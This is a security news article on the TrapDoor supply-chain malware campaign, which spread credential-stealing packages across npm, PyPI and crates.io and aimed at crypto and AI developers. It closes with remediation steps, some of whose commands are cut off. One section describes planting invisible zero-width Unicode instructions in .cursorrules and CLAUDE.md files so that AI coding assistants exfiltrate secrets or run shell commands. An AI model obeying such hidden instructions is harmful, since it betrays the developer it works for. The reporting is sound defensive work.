TrapDoor: The Multi-Registry Malware Targeting Crypto and AI Developers Through AI Config Files

What makes TrapDoor particularly dangerous is not just its cross-ecosystem reach, but a novel evasion technique that weaponizes AI coding assistants themselves. The malware plants hidden instructions inside .cursorrules and CLAUDE.md files using zero-width Unicode characters—completely invisible to human reviewers but readable by tools like Cursor and Claude Code, which can then be tricked into exfiltrating secrets under the guise of routine security scans .

TrapDoor's Cross-Registry Attack Strategy

The TrapDoor campaign operated simultaneously across three major open-source package registries, using distinct technical mechanisms tailored to each platform .

npm (21 packages)

The bulk of the malicious packages appeared on npm, where they used postinstall hooks to automatically execute a credential harvester upon installation. The core payload, a roughly 1,149-line script called trap-core.js, systematically scans the victim's environment for secrets and exfiltrates them to attacker-controlled infrastructure .

PyPI (7 packages)

The Python packages distributed through PyPI were designed to fetch and execute remote JavaScript payloads at import time. Once running, they deployed the same credential-stealing logic as the npm variants .

Crates.io (6 packages)

On the Rust ecosystem's primary registry, the malicious packages abused build.rs scripts to run credential-exfiltration code during the build process, ensuring execution even before the package's intended functionality was used .

The packages were disguised as legitimate developer tooling with names like token-usage-tracker, prompt-engineering-toolkit, and eth-wallet-security-auditor, making them appear useful to the targeted developer communities .

What Credentials Are Targeted

The TrapDoor payload systematically hunts for a broad range of high-value secrets. According to Socket's analysis, the malware harvests wallet files and keystores, SSH private keys, GitHub personal access tokens, AWS credentials, environment variables containing API keys, browser-stored credentials, and other developer secrets from the compromised machine .

Wallet-specific targets explicitly mentioned in reporting include MetaMask and Phantom browser extension data . The theft of GitHub tokens is particularly concerning because it can enable attackers to access private source code repositories, inject malicious code into CI/CD pipelines, or pivot laterally through compromised developer identities .

Targeted Developer Communities

Socket's investigation identified crypto, DeFi, Solana, Sui, and AI developers as the primary targets . The campaign's package naming conventions directly appealed to these communities, with themes around wallet security auditing, transaction monitoring, smart contract development, and AI context tooling.

The attackers understood that developers in these ecosystems routinely hold wallet keys for significant assets, access cloud infrastructure, and have privileged permissions across development toolchains—making a single compromised workstation a gateway to substantial financial and operational damage .

Zero-Width Unicode Evasion: The AI Config File Attack

The most technically novel aspect of TrapDoor is its exploitation of AI coding assistant trust boundaries. The malware attempts to modify or drop .cursorrules and CLAUDE.md files—configuration files that developers use to give project-specific instructions to AI coding tools like Cursor and Claude Code .

Inside these files, the attackers embed hidden instructions using zero-width Unicode characters (such as U+200B, U+200C, and U+FEFF). These characters are invisible in text editors and during standard code review, so a human developer sees nothing suspicious . However, AI coding assistants parse the full Unicode text and can be tricked into interpreting the hidden instructions as legitimate commands, potentially executing credential-harvesting workflows, exfiltrating source code, or running arbitrary shell commands without the developer's knowledge .

This creates a two-stage compromise: the package infects the developer's environment and steals immediate credentials, while the poisoned AI config file weaponizes the developer's own AI tools for further exploitation. Related research has confirmed that production AI agent platforms, including Claude Code and GitHub Copilot, can execute arbitrary commands embedded as invisible Unicode instructions in agent skill files .

Detection Speed and Scope

Socket's detection infrastructure identified TrapDoor releases with a median detection time of just 5 minutes and 27 seconds, with the fastest detection clocking in at 58 seconds . This rapid identification allowed researchers to connect the seemingly scattered package publications into a single coordinated campaign within 48 hours of the first suspicious upload .

All 34 identified packages across the three registries have been reported to the respective registry maintainers for removal .

Immediate Remediation Steps for Developers

If you or your team installed any of these packages, act immediately:

1. Rotate all exposed credentials

Regenerate cryptocurrency wallet seed phrases and move funds to new wallets. Rotate AWS IAM keys, GitHub personal access tokens, SSH key pairs, and any API tokens stored in environment variables . Revoke OAuth tokens for CI/CD integrations.

2. Audit package lock files

Run

npm audit

pip list

3. Inspect shell startup files

Check ~/.bashrc, ~/.zshrc, ~/.profile, and ~/.config/fish/config.fish for suspicious aliases or uncommented curl and wget commands that could establish persistence .

4. Review Git hooks

Examine .git/hooks/ in every repository for unauthorized pre-commit, post-commit, or pre-push hooks. The campaign's targeting of GitHub tokens makes account-level repository compromise a real possibility .

5. Scan GitHub Actions workflows

Review .github/workflows/ for unexpected workflow files, suspicious curl or wget steps, and unauthorized third-party actions. Check Actions run logs for unusual outbound network requests.

6. Check for AI config file tampering

Search all projects for .cursorrules and CLAUDE.md files containing zero-width Unicode characters. A grep command to detect invisible characters is:

Remove any suspicious files and verify with a hex dump .

7. Inspect persistence mechanisms

Check cron jobs (

crontab -l

8. Add supply chain defenses

Integrate supply-chain security scanning into your CI pipeline to catch suspicious packages before installation. Consider runtime detection tools that monitor access to wallet files, SSH keys, cloud credentials, and browser data directories .